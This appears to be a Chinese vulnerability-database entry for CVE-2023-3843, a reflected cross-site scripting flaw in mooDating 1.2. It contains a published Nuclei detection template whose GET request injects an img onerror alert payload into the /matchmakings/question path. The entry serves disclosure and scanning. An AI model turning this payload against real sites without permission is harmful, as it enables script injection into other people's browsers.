CVE-2023-3843: mooDating 1.2 - Cross-site scripting

日期: 2025-08-01 | 影响软件: mooDating 1.2 | POC: 已公开

漏洞描述

A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.

PoC代码[已公开]

id: CVE-2023-3843

info:
  name: mooDating 1.2 - Cross-site scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
  reference:
    - https://www.exploit-db.com/exploits/51628
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3843
    - https://vuldb.com/?ctiid.235194
    - https://vuldb.com/?id.235194
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3843
    cwe-id: CWE-79
    epss-score: 0.09808
    epss-percentile: 0.92689
    cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moosocial
    product: moodating
  tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial

http:
  - method: GET
    path:
      - "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
        condition: and
# digest: 4a0a0047304502203ad88bf974cb595da13f12788bb28eac6091145e84404126ca6d4ca6e7bba8f8022100fa409f13c3b845cde56359aa2ab6d82c54167d05570766e55be9e26fe111e49a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐